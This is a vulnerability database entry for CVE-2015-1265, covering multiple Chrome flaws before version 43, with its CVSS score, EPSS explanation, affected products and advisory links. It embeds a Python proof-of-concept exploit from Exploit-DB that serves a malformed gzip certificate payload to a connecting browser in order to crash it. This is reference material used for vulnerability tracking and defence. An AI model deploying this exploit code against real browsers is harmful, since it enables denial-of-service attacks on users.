CVE-2015-1265 : Detail

CVE-2015-1265

4.93%V4
Network
2015-05-20
08h00 +00:00
2017-09-16
07h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37766

Publication date : 2015-08-12 22h00 +00:00
Author : Paulos Yibelo
EDB Verified : No

#!/usr/bin/python2 import socket import sys import time kHost = '127.0.0.1' kPort = 443 def bind_listen(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) s.bind((kHost, kPort)) s.listen(1) return s def send_certificate(c, r): print '[*] sending certificate' payload = '' with open('compressed', 'rb') as tmp: payload = tmp.read() c.send('HTTP/1.1 200 OK\r\n') c.send('Content-Type: application/x-x509-user-cert\r\n') c.send('Content-Encoding: gzip\r\n') c.send('Content-Length: {}\r\n'.format(len(payload))) c.send('\r\n') c.send(payload) def main(): print '[*] listening for connection on port {}:{}'.format(kHost, kPort) s = bind_listen() while True: c, (host, port) = s.accept() print '[*] connection from {}:{}'.format(host, port) while True: r = c.recv(1024) if 'favicon' in r: c.send('HTTP/1.1 404 Not Found\r\n\r\n') else: send_certificate(c, r) time.sleep(20) sys.exit(0) if __name__ == '__main__': main() Thanks, Paulos Yibelo

Products Mentioned

Configuraton 0

Debian>>Debian_linux >> Version 8.0

Configuraton 0

Google>>Chrome >> Version To (including) 42.0.2311.152

References

https://www.exploit-db.com/exploits/37766/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/74727
Tags : vdb-entry, x_refsource_BID
https://security.gentoo.org/glsa/201506-04
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securitytracker.com/id/1032375
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2015/dsa-3267
Tags : vendor-advisory, x_refsource_DEBIAN